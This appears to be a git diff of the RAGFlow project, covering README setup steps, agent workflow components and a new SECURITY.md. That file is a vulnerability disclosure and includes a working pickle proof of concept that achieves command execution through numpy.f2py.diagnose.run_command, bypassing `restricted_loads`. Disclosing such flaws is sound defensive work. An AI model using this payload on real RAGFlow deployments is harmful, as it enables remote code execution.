$ docker build -t infiniflow/ragflow:v0.11.0 .
$ cd ragflow/docker
$ chmod +x ./entrypoint.sh
$ docker compose up -d
@@ -195,24 +210,27 @@ $ docker compose up -d
如需从源码启动服务,请参考以下步骤:

1. 克隆仓库

```bash
$ git clone https://github.com/infiniflow/ragflow.git
$ cd ragflow/
```

2. 创建虚拟环境(确保已安装 Anaconda 或 Miniconda)

```bash
$ conda create -n ragflow python=3.11.0
$ conda activate ragflow
$ pip install -r requirements.txt
```
如果cuda > 12.0,需额外执行以下命令:
如果 cuda > 12.0,需额外执行以下命令:
```bash
$ pip uninstall -y onnxruntime-gpu
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
```

3. 拷贝入口脚本并配置环境变量

```bash
$ cp docker/entrypoint.sh .
$ vi entrypoint.sh
@@ -223,19 +241,20 @@ $ which python
$ pwd
```

将上述`which python`的输出作为`PY`的值,将`pwd`的输出作为`PYTHONPATH`的值。
将上述 `which python` 的输出作为 `PY` 的值,将 `pwd` 的输出作为 `PYTHONPATH` 的值。

`LD_LIBRARY_PATH`如果环境已经配置好,可以注释掉。
`LD_LIBRARY_PATH` 如果环境已经配置好,可以注释掉。

```bash
# 此处配置需要按照实际情况调整,两个export为新增配置
# 此处配置需要按照实际情况调整,两个 export 为新增配置
PY=${PY}
export PYTHONPATH=${PYTHONPATH}
# 可选:添加Hugging Face镜像
# 可选:添加 Hugging Face 镜像
export HF_ENDPOINT=https://hf-mirror.com
```

4. 启动基础服务

```bash
$ cd docker
$ docker compose -f docker-compose-base.yml up -d
@@ -245,20 +264,24 @@ $ docker compose -f docker-compose-base.yml up -d
确保**docker/.env**中的配置与**conf/service_conf.yaml**中配置一致, **service_conf.yaml**中相关服务的IP地址与端口应该改成本机IP地址及容器映射出来的端口。

6. 启动服务

```bash
$ chmod +x ./entrypoint.sh
$ bash ./entrypoint.sh
```

7. 启动WebUI服务

```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
$ vim .umirc.ts
# 修改proxy.target为127.0.0.1:9380
# 修改proxy.target为http://127.0.0.1:9380
$ npm run dev
```

8. 部署WebUI服务

```bash
$ cd web
$ npm install --registry=https://registry.npmmirror.com --force
@@ -273,8 +296,10 @@ $ systemctl start nginx
```
## 📚 技术文档

- [Quickstart](./docs/quickstart.md)
- [FAQ](./docs/faq.md)
- [Quickstart](https://ragflow.io/docs/dev/)
- [User guide](https://ragflow.io/docs/dev/category/user-guides)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQ](https://ragflow.io/docs/dev/faq)

## 📜 路线图

@@ -284,10 +309,15 @@ $ systemctl start nginx

- [Discord](https://discord.gg/4XxujFgUN7)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

## 🙌 贡献指南

RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的[贡献者指南](https://github.com/infiniflow/ragflow/blob/main/docs/CONTRIBUTING.md) 。
RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的 [贡献者指南](./docs/references/CONTRIBUTING.md) 。

## 🤝 商务合作

- [预约咨询](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)

## 👥 加入社区

74 SECURITY.md (new file)
@@ -0,0 +1,74 @@
# Security Policy

## Supported Versions

The following versions of this project are currently supported with security updates.

| Version | Supported          |
| ------- | ------------------ |
| <=0.7.0 | :white_check_mark: |

## Reporting a Vulnerability

### Branch name

main

### Actual behavior

The `restricted_loads` function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable, leading to code execution.
The main reason is that the numpy module has a `numpy.f2py.diagnose.run_command` function that directly executes commands, while the `restricted_loads` function allows users to import functions from the numpy module.

### Steps to reproduce

**ragflow_patch.py**

```py
import builtins
import io
import pickle

safe_module = {
    'numpy',
    'rag_flow'
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        import importlib
        if module.split('.')[0] in safe_module:
            _module = importlib.import_module(module)
            return getattr(_module, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))


def restricted_loads(src):
    """Helper function analogous to pickle.loads()."""
    return RestrictedUnpickler(io.BytesIO(src)).load()
```
Then, **PoC.py**
```py
import pickle
from ragflow_patch import restricted_loads

class Exploit:
    def __reduce__(self):
        import numpy.f2py.diagnose
        return numpy.f2py.diagnose.run_command, ('whoami', )

Payload = pickle.dumps(Exploit())
restricted_loads(Payload)
```
**Result**


### Additional information

#### How to prevent?
Strictly filter both the module and the name before resolving them with `getattr`.
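
A minimal sketch of that idea, assuming the set of globals RAGFlow actually needs to unpickle can be enumerated: instead of trusting every name inside an allowed module, allow only explicit `(module, name)` pairs. The entries in `SAFE_GLOBALS` below are placeholders, not a vetted list.

```py
import io
import pickle

# Explicit (module, name) pairs that are known to be safe to resolve.
# Placeholder entries: populate with the exact symbols your pickles require.
SAFE_GLOBALS = {
    ("numpy", "ndarray"),
    ("numpy.core.multiarray", "_reconstruct"),
}


class StrictUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            import importlib
            return getattr(importlib.import_module(module), name)
        # Everything not explicitly allowed is rejected, including callables
        # such as numpy.f2py.diagnose.run_command.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def strict_loads(src):
    """Stricter variant of restricted_loads(): allowlist of exact globals."""
    return StrictUnpickler(io.BytesIO(src)).load()
```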

45 agent/README.md (new file)
@@ -0,0 +1,45 @@
English | [简体中文](./README_zh.md)

# *Graph*

## Introduction

A *graph* is a mathematical structure composed of nodes and edges.
Here it is used to compose a complex workflow or agent.
Unlike a DAG, this graph may contain cycles, which lets us describe iterative agents and workflows.
Under this folder, we provide a test tool, ./test/client.py, which can run DSL files such as the JSON examples in ./test/dsl_examples.
Run this client from the same folder in which you start RAGFlow. If RAGFlow runs in Docker, enter the container before running the client.
Otherwise, a correct configuration in conf/service_conf.yaml is essential.

```bash
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
usage: client.py [-h] -s DSL -t TENANT_ID -m

options:
  -h, --help            show this help message and exit
  -s DSL, --dsl DSL     input dsl
  -t TENANT_ID, --tenant_id TENANT_ID
                        Tenant ID
  -m, --stream          Stream output
```
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/79179c5e-d4d6-464a-b6c4-5721cb329899" width="1000"/>
</div>

## How to gain a TENANT_ID in the command line?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
</div>
💡 We plan to display it here in the near future.
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
</div>

## How to set 'kb_ids' for component 'Retrieval' in DSL?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
</div>
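
For illustration, here is a hedged sketch of how such a Retrieval node might look inside a DSL file, written as the equivalent Python dict. The `kb_ids` value is a placeholder (copy the real IDs from the page shown above), and any other `params` the component supports are omitted.

```python
# Illustrative fragment of a DSL "components" entry; the ID is a placeholder.
retrieval_component = {
    "obj": {
        "component_name": "Retrieval",
        "params": {
            "kb_ids": ["<YOUR_KB_ID>"]
        }
    },
    "downstream": ["generate_0"],
    "upstream": ["answer_0"]
}
```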

46 agent/README_zh.md (new file)
@@ -0,0 +1,46 @@
[English](./README.md) | 简体中文

# *Graph*

## 简介

"Graph"是一个由节点和边组成的数学概念。
它被用来构建复杂的工作流或代理。
这个图超越了有向无环图(DAG),我们可以使用循环来描述我们的代理或工作流。
在这个文件夹下,我们提供了一个测试工具 ./test/client.py,它可以测试文件夹 ./test/dsl_examples 下的 DSL 文件(JSON 格式)。
请在启动 RAGFlow 的同一文件夹中使用此客户端。如果它是通过 Docker 运行的,请在运行客户端之前进入容器。
否则,正确配置 conf/service_conf.yaml 文件是必不可少的。

```bash
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
usage: client.py [-h] -s DSL -t TENANT_ID -m

options:
  -h, --help            show this help message and exit
  -s DSL, --dsl DSL     input dsl
  -t TENANT_ID, --tenant_id TENANT_ID
                        Tenant ID
  -m, --stream          Stream output
```
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/05924730-c427-495b-8ee4-90b8b2250681" width="1000"/>
</div>

## 命令行中的 TENANT_ID 如何获得?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
</div>
💡 后面会展示在这里:
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
</div>

## DSL 里面的 Retrieval 组件的 kb_ids 怎么填?
<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
</div>

0 agent/__init__.py (new file)

305 agent/canvas.py (new file)
@@ -0,0 +1,305 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import importlib
import json
import traceback
from abc import ABC
from copy import deepcopy
from functools import partial

import pandas as pd

from agent.component import component_class
from agent.component.base import ComponentBase
from agent.settings import flow_logger, DEBUG


class Canvas(ABC):
    """
    dsl = {
        "components": {
            "begin": {
                "obj":{
                    "component_name": "Begin",
                    "params": {},
                },
                "downstream": ["answer_0"],
                "upstream": [],
            },
            "answer_0": {
                "obj": {
                    "component_name": "Answer",
                    "params": {}
                },
                "downstream": ["retrieval_0"],
                "upstream": ["begin", "generate_0"],
            },
            "retrieval_0": {
                "obj": {
                    "component_name": "Retrieval",
                    "params": {}
                },
                "downstream": ["generate_0"],
                "upstream": ["answer_0"],
            },
            "generate_0": {
                "obj": {
                    "component_name": "Generate",
                    "params": {}
                },
                "downstream": ["answer_0"],
                "upstream": ["retrieval_0"],
            }
        },
        "history": [],
        "messages": [],
        "reference": [],
        "path": [["begin"]],
        "answer": []
    }
    """

    def __init__(self, dsl: str, tenant_id=None):
        self.path = []
        self.history = []
        self.messages = []
        self.answer = []
        self.components = {}
        self.dsl = json.loads(dsl) if dsl else {
            "components": {
                "begin": {
                    "obj": {
                        "component_name": "Begin",
                        "params": {
                            "prologue": "Hi there!"
                        }
                    },
                    "downstream": [],
                    "upstream": []
                }
            },
            "history": [],
            "messages": [],
            "reference": [],
            "path": [],
            "answer": []
        }
        self._tenant_id = tenant_id
        self._embed_id = ""
        self.load()

    def load(self):
        self.components = self.dsl["components"]
        cpn_nms = set([])
        for k, cpn in self.components.items():
            cpn_nms.add(cpn["obj"]["component_name"])

        assert "Begin" in cpn_nms, "There has to be a 'Begin' component."
        assert "Answer" in cpn_nms, "There has to be an 'Answer' component."

        for k, cpn in self.components.items():
            cpn_nms.add(cpn["obj"]["component_name"])
            param = component_class(cpn["obj"]["component_name"] + "Param")()
            param.update(cpn["obj"]["params"])
            param.check()
            cpn["obj"] = component_class(cpn["obj"]["component_name"])(self, k, param)
            if cpn["obj"].component_name == "Categorize":
                for _, desc in param.category_description.items():
                    if desc["to"] not in cpn["downstream"]:
                        cpn["downstream"].append(desc["to"])

        self.path = self.dsl["path"]
        self.history = self.dsl["history"]
        self.messages = self.dsl["messages"]
        self.answer = self.dsl["answer"]
        self.reference = self.dsl["reference"]
        self._embed_id = self.dsl.get("embed_id", "")

    def __str__(self):
        self.dsl["path"] = self.path
        self.dsl["history"] = self.history
        self.dsl["messages"] = self.messages
        self.dsl["answer"] = self.answer
        self.dsl["reference"] = self.reference
        self.dsl["embed_id"] = self._embed_id
        dsl = {
            "components": {}
        }
        for k in self.dsl.keys():
            if k in ["components"]: continue
            dsl[k] = deepcopy(self.dsl[k])

        for k, cpn in self.components.items():
            if k not in dsl["components"]:
                dsl["components"][k] = {}
            for c in cpn.keys():
                if c == "obj":
                    dsl["components"][k][c] = json.loads(str(cpn["obj"]))
                    continue
                dsl["components"][k][c] = deepcopy(cpn[c])
        return json.dumps(dsl, ensure_ascii=False)

    def reset(self):
        self.path = []
        self.history = []
        self.messages = []
        self.answer = []
        self.reference = []
        for k, cpn in self.components.items():
            self.components[k]["obj"].reset()
        self._embed_id = ""

    def run(self, **kwargs):
        ans = ""
        if self.answer:
            cpn_id = self.answer[0]
            self.answer.pop(0)
            try:
                ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
            except Exception as e:
                ans = ComponentBase.be_output(str(e))
            self.path[-1].append(cpn_id)
            if kwargs.get("stream"):
                assert isinstance(ans, partial)
                return ans
            self.history.append(("assistant", ans.to_dict("records")))
            return ans

        if not self.path:
            self.components["begin"]["obj"].run(self.history, **kwargs)
            self.path.append(["begin"])

        self.path.append([])
        ran = -1

        def prepare2run(cpns):
            nonlocal ran, ans
            for c in cpns:
                if self.path[-1] and c == self.path[-1][-1]: continue
                cpn = self.components[c]["obj"]
                if cpn.component_name == "Answer":
                    self.answer.append(c)
                else:
                    if DEBUG: print("RUN: ", c)
                    if cpn.component_name == "Generate":
                        cpids = cpn.get_dependent_components()
                        if any([c not in self.path[-1] for c in cpids]):
                            continue
                    ans = cpn.run(self.history, **kwargs)
                    self.path[-1].append(c)
            ran += 1

        prepare2run(self.components[self.path[-2][-1]]["downstream"])
        while 0 <= ran < len(self.path[-1]):
            if DEBUG: print(ran, self.path)
            cpn_id = self.path[-1][ran]
            cpn = self.get_component(cpn_id)
            if not cpn["downstream"]: break

            loop = self._find_loop()
            if loop: raise OverflowError(f"Too many loops: {loop}")

            if cpn["obj"].component_name.lower() in ["switch", "categorize", "relevant"]:
                switch_out = cpn["obj"].output()[1].iloc[0, 0]
                assert switch_out in self.components, \
                    "{}'s output: {} not valid.".format(cpn_id, switch_out)
                try:
                    prepare2run([switch_out])
                except Exception as e:
                    for p in [c for p in self.path for c in p][::-1]:
                        if p.lower().find("answer") >= 0:
                            self.get_component(p)["obj"].set_exception(e)
                            prepare2run([p])
                            break
                    traceback.print_exc()
                    break
                continue

            try:
                prepare2run(cpn["downstream"])
            except Exception as e:
                for p in [c for p in self.path for c in p][::-1]:
                    if p.lower().find("answer") >= 0:
                        self.get_component(p)["obj"].set_exception(e)
                        prepare2run([p])
                        break
                traceback.print_exc()
                break

        if self.answer:
            cpn_id = self.answer[0]
            self.answer.pop(0)
            ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
            self.path[-1].append(cpn_id)
            if kwargs.get("stream"):
                assert isinstance(ans, partial)
                return ans

            self.history.append(("assistant", ans.to_dict("records")))

        return ans

    def get_component(self, cpn_id):
        return self.components[cpn_id]

    def get_tenant_id(self):
        return self._tenant_id

    def get_history(self, window_size):
        convs = []
        for role, obj in self.history[(window_size + 1) * -1:]:
            convs.append({"role": role, "content": (obj if role == "user" else
                                                    '\n'.join(pd.DataFrame(obj)['content']))})
        return convs

    def add_user_input(self, question):
        self.history.append(("user", question))

    def set_embedding_model(self, embed_id):
        self._embed_id = embed_id

    def get_embedding_model(self):
        return self._embed_id

    def _find_loop(self, max_loops=6):
        path = self.path[-1][::-1]
        if len(path) < 2: return False

        for i in range(len(path)):
            if path[i].lower().find("answer") >= 0:
                path = path[:i]
                break

        if len(path) < 2: return False

        for l in range(2, len(path) // 2):
            pat = ",".join(path[0:l])
            path_str = ",".join(path)
            if len(pat) >= len(path_str): return False
            loop = max_loops
            while path_str.find(pat) == 0 and loop >= 0:
                loop -= 1
                if len(pat)+1 >= len(path_str):
                    return False
                path_str = path_str[len(pat)+1:]
            if loop < 0:
                pat = " => ".join([p.split(":")[0] for p in path[0:l]])
                return pat + " => " + pat

        return False

    def get_prologue(self):
        return self.components["begin"]["obj"]._param.prologue

35 agent/component/__init__.py (new file)
@@ -0,0 +1,35 @@
import importlib
from .begin import Begin, BeginParam
from .generate import Generate, GenerateParam
from .retrieval import Retrieval, RetrievalParam
from .answer import Answer, AnswerParam
from .categorize import Categorize, CategorizeParam
from .switch import Switch, SwitchParam
from .relevant import Relevant, RelevantParam
from .message import Message, MessageParam
from .rewrite import RewriteQuestion, RewriteQuestionParam
from .keyword import KeywordExtract, KeywordExtractParam
from .baidu import Baidu, BaiduParam
from .duckduckgo import DuckDuckGo, DuckDuckGoParam
from .wikipedia import Wikipedia, WikipediaParam
from .pubmed import PubMed, PubMedParam
from .arxiv import ArXiv, ArXivParam
from .google import Google, GoogleParam
from .bing import Bing, BingParam
from .googlescholar import GoogleScholar, GoogleScholarParam
from .deepl import DeepL, DeepLParam
from .github import GitHub, GitHubParam
from .baidufanyi import BaiduFanyi, BaiduFanyiParam
from .qweather import QWeather, QWeatherParam
from .exesql import ExeSQL, ExeSQLParam
from .yahoofinance import YahooFinance, YahooFinanceParam
from .wencai import WenCai, WenCaiParam
from .jin10 import Jin10, Jin10Param
from .tushare import TuShare, TuShareParam
from .akshare import AkShare, AkShareParam


def component_class(class_name):
    m = importlib.import_module("agent.component")
    c = getattr(m, class_name)
    return c
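
# Illustrative usage (not part of this file): canvas.py resolves components
# dynamically through this registry, e.g.
#
#   param = component_class("RetrievalParam")()          # build the params object
#   param.check()
#   cpn = component_class("Retrieval")(canvas, "retrieval_0", param)
#
# so registering a new component only requires adding its import above.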

56 agent/component/akshare.py (new file)
@@ -0,0 +1,56 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
import akshare as ak
from agent.component.base import ComponentBase, ComponentParamBase


class AkShareParam(ComponentParamBase):
    """
    Define the AkShare component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")


class AkShare(ComponentBase, ABC):
    component_name = "AkShare"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = ",".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return AkShare.be_output("")

        try:
            ak_res = []
            stock_news_em_df = ak.stock_news_em(symbol=ans)
            stock_news_em_df = stock_news_em_df.head(self._param.top_n)
            ak_res = [{"content": '<a href="' + i["新闻链接"] + '">' + i["新闻标题"] + '</a>\n 新闻内容: ' + i[
                "新闻内容"] + " \n发布时间:" + i["发布时间"] + " \n文章来源: " + i["文章来源"]} for index, i in stock_news_em_df.iterrows()]
        except Exception as e:
            return AkShare.be_output("**ERROR**: " + str(e))

        if not ak_res:
            return AkShare.be_output("")

        return pd.DataFrame(ak_res)
agent/component/answer.py (new file, 79 lines)
@@ -0,0 +1,79 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial

import pandas as pd

from agent.component.base import ComponentBase, ComponentParamBase


class AnswerParam(ComponentParamBase):
    """
    Define the Answer component parameters.
    """

    def __init__(self):
        super().__init__()
        self.post_answers = []

    def check(self):
        return True


class Answer(ComponentBase, ABC):
    component_name = "Answer"

    def _run(self, history, **kwargs):
        if kwargs.get("stream"):
            return partial(self.stream_output)

        ans = self.get_input()
        if self._param.post_answers:
            ans = pd.concat([ans, pd.DataFrame([{"content": random.choice(self._param.post_answers)}])],
                            ignore_index=False)
        return ans

    def stream_output(self):
        res = None
        if hasattr(self, "exception") and self.exception:
            res = {"content": str(self.exception)}
            self.exception = None
            yield res
            self.set_output(res)
            return

        stream = self.get_stream_input()
        if isinstance(stream, pd.DataFrame):
            res = stream
            answer = ""
            for _, row in stream.iterrows():
                answer += row.to_dict()["content"]
                yield {"content": answer}
        else:
            for st in stream():
                res = st
                yield st
        if self._param.post_answers:
            res["content"] += random.choice(self._param.post_answers)
            yield res

        self.set_output(res)

    def set_exception(self, e):
        self.exception = e
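When invoked with stream=True, Answer._run returns a generator factory (a functools.partial over stream_output) rather than a DataFrame, and the caller is expected to drain it. A hedged sketch of that calling convention; answer_cpn and history are placeholders for objects the agent runtime would supply:

    out = answer_cpn.run(history, stream=True)   # returns partial(stream_output)
    if callable(out):
        for chunk in out():                      # each chunk is {"content": "..."}
            print(chunk["content"])              # progressively longer answer text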
agent/component/arxiv.py (new file, 69 lines)
@@ -0,0 +1,69 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import arxiv
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class ArXivParam(ComponentParamBase):
    """
    Define the ArXiv component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 6
        self.sort_by = 'submittedDate'

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.sort_by, "ArXiv Search Sort_by",
                               ['submittedDate', 'lastUpdatedDate', 'relevance'])


class ArXiv(ComponentBase, ABC):
    component_name = "ArXiv"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return ArXiv.be_output("")

        try:
            sort_choices = {"relevance": arxiv.SortCriterion.Relevance,
                            "lastUpdatedDate": arxiv.SortCriterion.LastUpdatedDate,
                            'submittedDate': arxiv.SortCriterion.SubmittedDate}
            arxiv_client = arxiv.Client()
            search = arxiv.Search(
                query=ans,
                max_results=self._param.top_n,
                sort_by=sort_choices[self._param.sort_by]
            )
            arxiv_res = [
                {"content": 'Title: ' + i.title + '\nPdf_Url: <a href="' + i.pdf_url + '"></a> \nSummary: ' + i.summary}
                for i in list(arxiv_client.results(search))]
        except Exception as e:
            return ArXiv.be_output("**ERROR**: " + str(e))

        if not arxiv_res:
            return ArXiv.be_output("")

        df = pd.DataFrame(arxiv_res)
        if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
        return df
agent/component/baidu.py (new file, 69 lines)
@@ -0,0 +1,69 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial
import pandas as pd
import requests
import re
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase


class BaiduParam(ComponentParamBase):
    """
    Define the Baidu component parameters.
    """

    def __init__(self):
        super().__init__()
        self.top_n = 10

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")


class Baidu(ComponentBase, ABC):
    component_name = "Baidu"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return Baidu.be_output("")

        try:
            url = 'https://www.baidu.com/s?wd=' + ans + '&rn=' + str(self._param.top_n)
            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36'}
            response = requests.get(url=url, headers=headers)

            url_res = re.findall(r"'url': \\\"(.*?)\\\"}", response.text)
            title_res = re.findall(r"'title': \\\"(.*?)\\\",\\n", response.text)
            body_res = re.findall(r"\"contentText\":\"(.*?)\"", response.text)
            baidu_res = [{"content": re.sub('<em>|</em>', '', '<a href="' + url + '">' + title + '</a> ' + body)}
                         for url, title, body in zip(url_res, title_res, body_res)]
            del body_res, url_res, title_res
        except Exception as e:
            return Baidu.be_output("**ERROR**: " + str(e))

        if not baidu_res:
            return Baidu.be_output("")

        df = pd.DataFrame(baidu_res)
        if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
        return df
agent/component/baidufanyi.py (new file, 99 lines)
@@ -0,0 +1,99 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
import requests
from agent.component.base import ComponentBase, ComponentParamBase
from hashlib import md5


class BaiduFanyiParam(ComponentParamBase):
    """
    Define the BaiduFanyi component parameters.
    """

    def __init__(self):
        super().__init__()
        self.appid = "xxx"
        self.secret_key = "xxx"
        self.trans_type = 'translate'
        self.parameters = []
        self.source_lang = 'auto'
        self.target_lang = 'auto'
        self.domain = 'finance'

    def check(self):
        self.check_empty(self.appid, "BaiduFanyi APPID")
        self.check_empty(self.secret_key, "BaiduFanyi Secret Key")
        self.check_valid_value(self.trans_type, "Translate type", ['translate', 'fieldtranslate'])
        self.check_valid_value(self.source_lang, "Source language",
                               ['auto', 'zh', 'en', 'yue', 'wyw', 'jp', 'kor', 'fra', 'spa', 'th', 'ara', 'ru', 'pt',
                                'de', 'it', 'el', 'nl', 'pl', 'bul', 'est', 'dan', 'fin', 'cs', 'rom', 'slo', 'swe',
                                'hu', 'cht', 'vie'])
        self.check_valid_value(self.target_lang, "Target language",
                               ['auto', 'zh', 'en', 'yue', 'wyw', 'jp', 'kor', 'fra', 'spa', 'th', 'ara', 'ru', 'pt',
                                'de', 'it', 'el', 'nl', 'pl', 'bul', 'est', 'dan', 'fin', 'cs', 'rom', 'slo', 'swe',
                                'hu', 'cht', 'vie'])
        self.check_valid_value(self.domain, "Translate field",
                               ['it', 'finance', 'machinery', 'senimed', 'novel', 'academic', 'aerospace', 'wiki',
                                'news', 'law', 'contract'])


class BaiduFanyi(ComponentBase, ABC):
    component_name = "BaiduFanyi"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = " - ".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return BaiduFanyi.be_output("")

        try:
            source_lang = self._param.source_lang
            target_lang = self._param.target_lang
            appid = self._param.appid
            # salt must be a string: it is concatenated into both the sign and the URL
            salt = str(random.randint(32768, 65536))
            secret_key = self._param.secret_key

            if self._param.trans_type == 'translate':
                sign = md5((appid + ans + salt + secret_key).encode('utf-8')).hexdigest()
                url = 'http://api.fanyi.baidu.com/api/trans/vip/translate?' + 'q=' + ans + '&from=' + source_lang + '&to=' + target_lang + '&appid=' + appid + '&salt=' + salt + '&sign=' + sign
                headers = {"Content-Type": "application/x-www-form-urlencoded"}
                response = requests.post(url=url, headers=headers).json()

                if response.get('error_code'):
                    return BaiduFanyi.be_output("**Error**:" + response['error_msg'])

                return BaiduFanyi.be_output(response['trans_result'][0]['dst'])
            elif self._param.trans_type == 'fieldtranslate':
                domain = self._param.domain
                sign = md5((appid + ans + salt + domain + secret_key).encode('utf-8')).hexdigest()
                url = 'http://api.fanyi.baidu.com/api/trans/vip/fieldtranslate?' + 'q=' + ans + '&from=' + source_lang + '&to=' + target_lang + '&appid=' + appid + '&salt=' + salt + '&domain=' + domain + '&sign=' + sign
                headers = {"Content-Type": "application/x-www-form-urlencoded"}
                response = requests.post(url=url, headers=headers).json()

                if response.get('error_code'):
                    return BaiduFanyi.be_output("**Error**:" + response['error_msg'])

                return BaiduFanyi.be_output(response['trans_result'][0]['dst'])

        except Exception as e:
            return BaiduFanyi.be_output("**Error**:" + str(e))
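For reference, the signing used above follows Baidu Fanyi's published recipe: sign = MD5(appid + q + salt + secret_key), with the domain inserted before the secret key for field translation. A standalone sketch with made-up credentials:

    from hashlib import md5

    appid, secret_key, salt = "20240000000001", "demo_secret", "35678"  # made-up values
    q = "hello"
    sign = md5((appid + q + salt + secret_key).encode("utf-8")).hexdigest()
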